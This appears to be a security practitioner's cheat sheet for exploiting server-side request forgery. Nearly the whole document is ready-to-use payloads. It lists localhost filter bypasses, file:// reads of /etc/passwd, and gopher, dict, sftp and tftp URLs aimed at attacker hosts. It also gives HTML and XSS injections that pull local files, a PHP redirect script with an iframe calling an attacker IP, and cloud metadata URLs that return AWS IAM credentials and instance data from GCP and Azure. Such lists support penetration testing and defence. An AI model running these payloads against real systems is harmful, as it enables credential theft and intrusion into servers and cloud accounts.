📀SSRF CHEATSHEET

Below you will find my cheatsheet for exploiting Server Side Request Forgery (SSRF):

---

___Detection:___

Check out parameters such as /file=, /path=, /src= to see if the application can send requests only to whitelisted applications

Check out if there is PDF or any other file export tool in place which may be vulnerable to SSRF

---

___Basic localhost Payloads:___

http://127.0.0.1:port

http://localhost:port

https://127.0.0.1:port

https://localhost:port

http://[::]:port

http://0000::1:port

http://[0:0:0:0:0:ffff:127.0.0.1]

http://0/

http://127.1

http://127.0.1

---

___File path:___

/etc/passwd

file:///etc/passwd

file://path/to/file

file://\/\/etc/passwd

---

___With other protocols:___

sftp://attacker.com:port/

dict://attacker:port/

tftp://attacker.com:port/

ldap://localhost:port/

gopher://127.0.0.1:port/

---

___From XSS:___

\<img src="xxx" onerror="document.write('\<iframe src=file:///etc/passwd>\</iframe>')"/>\

\<link rel=attachment href="file:///etc/passwd">\

1. <iframe src='file:///etc/passwd' width='600' height='600'>
2. <embed src='file:///etc/passwd' width='600' height='600'>
3. <object data='file:///etc/passwd' width='600' height='600' type='text/html'
    <portal src='file:///etc/passwd' id='portal'>
5. <link rel='attachment' href='file:///etc/passwd'>
6. <annotation file='/etc/passwd' content='/etc/passwd' icon='Graph' title='Attached File' pos-x='195'>
7. <​meta http-equiv='refresh' content='0;url=file:///etc/passwd'>
8. <​script>window.location = "file:///etc/passwd";<​/script>
9. <img src="x" onerror​="window.location='file:///etc/passwd'">
10. <link rel="import" href="https://lnkd.in/gsf3JpAK">
11. <!--#include file="file:///etc/passwd" -->

---

With iframe injection:

<?php $file = $_GET['file']; header("location:file://$file");?>

\<iframe src="http://attacker-ip/test.php?file=/etc/passwd">\</iframe>\

---

___AWS:___

http://instance-data

http://169.254.169.254

http://169.254.169.254/latest/user-data

http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]

http://169.254.169.254/latest/meta-data/

http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance

http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]

http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance

http://169.254.169.254/latest/meta-data/ami-id

http://169.254.169.254/latest/meta-data/reservation-id

http://169.254.169.254/latest/meta-data/hostname

http://169.254.169.254/latest/meta-data/public-keys/

http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key

http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy

http://169.254.169.254/latest/meta-data/iam/security-credentials/s3access

http://169.254.169.254/latest/dynamic/instance-identity/document

---

___Google Cloud:___

http://169.254.169.254/computeMetadata/v1/

http://metadata.google.internal/computeMetadata/v1/

http://metadata/computeMetadata/v1/

http://metadata.google.internal/computeMetadata/v1/instance/hostname

http://metadata.google.internal/computeMetadata/v1/instance/id

http://metadata.google.internal/computeMetadata/v1/project/project-id

---

___Azure:___

http://169.254.169.254/metadata/v1/maintenance

http://169.254.169.254/metadata/instance?api-version=2017-04-02

http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text

---